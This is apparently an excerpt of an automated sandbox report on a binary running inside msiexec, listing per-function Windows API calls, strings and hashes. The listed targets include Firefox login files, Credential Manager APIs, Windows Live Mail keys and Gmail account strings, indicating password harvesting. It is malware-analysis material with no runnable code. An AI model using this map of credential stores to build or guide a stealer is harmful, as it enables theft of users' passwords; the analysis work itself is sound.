                                                              • memset.MSVCRT ref: 0040A9BC
                                                              • sprintf.MSVCRT ref: 0040A9F0
                                                              • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                              • sprintf.MSVCRT ref: 0040AABE
                                                              • _mbscat.MSVCRT ref: 0040AAED
                                                                • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                              • sprintf.MSVCRT ref: 0040AB21
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 710961058-601624466
                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                              Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: sprintf$memset$_mbscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 3402215030-3842416460
                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                              Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                              • strlen.MSVCRT ref: 0040F139
                                                              • strlen.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F187
                                                              • strlen.MSVCRT ref: 0040F196
                                                              • strlen.MSVCRT ref: 0040F1A4
                                                              • memset.MSVCRT ref: 0040F1EA
                                                              • strlen.MSVCRT ref: 0040F1F9
                                                              • strlen.MSVCRT ref: 0040F207
                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                              • API String ID: 2003275452-3138536805
                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                              Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C3F7
                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                              • strrchr.MSVCRT ref: 0040C417
                                                              • _mbscat.MSVCRT ref: 0040C431
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1012775001-1343505058
                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                              Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 1439213657-1959339147
                                                              • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                              • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                              • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                              • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                              Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00444612
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 0044462E
                                                              • memset.MSVCRT ref: 00444668
                                                              • memset.MSVCRT ref: 0044467C
                                                              • memset.MSVCRT ref: 00444690
                                                              • memset.MSVCRT ref: 004446B6
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                              • String ID: salu
                                                              • API String ID: 3691931180-4177317985
                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                              Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                              Function 00443AAB Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 136stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • strlen.MSVCRT ref: 00443AD2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                              • memset.MSVCRT ref: 00443B2E
                                                              • memset.MSVCRT ref: 00443B4B
                                                              • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                              • LocalFree.KERNEL32(?), ref: 00443C23
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail$`{g
                                                              • API String ID: 4030136668-1743892429
                                                              • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                              • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                              • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                              • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                              Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sprintf.MSVCRT ref: 0040957B
                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                              • sprintf.MSVCRT ref: 004095EB
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                              • memset.MSVCRT ref: 0040961C
                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                              Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                              Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcsstr.MSVCRT ref: 0040426A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                              • strchr.MSVCRT ref: 004042F6
                                                              • strlen.MSVCRT ref: 0040430A
                                                              • sprintf.MSVCRT ref: 0040432B
                                                              • strchr.MSVCRT ref: 0040433C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 3866421160-4070641962
                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                              Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                              • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                              • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                              • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                              • memset.MSVCRT ref: 004097BD
                                                              • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                              • API String ID: 1035899707-3647959541
                                                              • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                              • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                              Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 714388716-318151290
                                                              • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                              • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                              • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                              • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                              Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                              • SelectObject.GDI32(?,?), ref: 0040CACC
                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                              • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                              • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                              • SetCursor.USER32(00000000), ref: 0040CB35
                                                              • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                              • SetFocus.USER32(?), ref: 0040CB92
                                                              • SetFocus.USER32(?), ref: 0040CC0B
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                              • String ID:
                                                              • API String ID: 1416211542-0
                                                              • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                              • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                              • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                              • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                              Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2360744853-2229823034
                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                              Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strchr.MSVCRT ref: 004100E4
                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                              • _mbscat.MSVCRT ref: 0041014D
                                                              • memset.MSVCRT ref: 00410129
                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                              • memset.MSVCRT ref: 00410171
                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                              • _mbscat.MSVCRT ref: 00410197
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 912701516-1821301763
                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
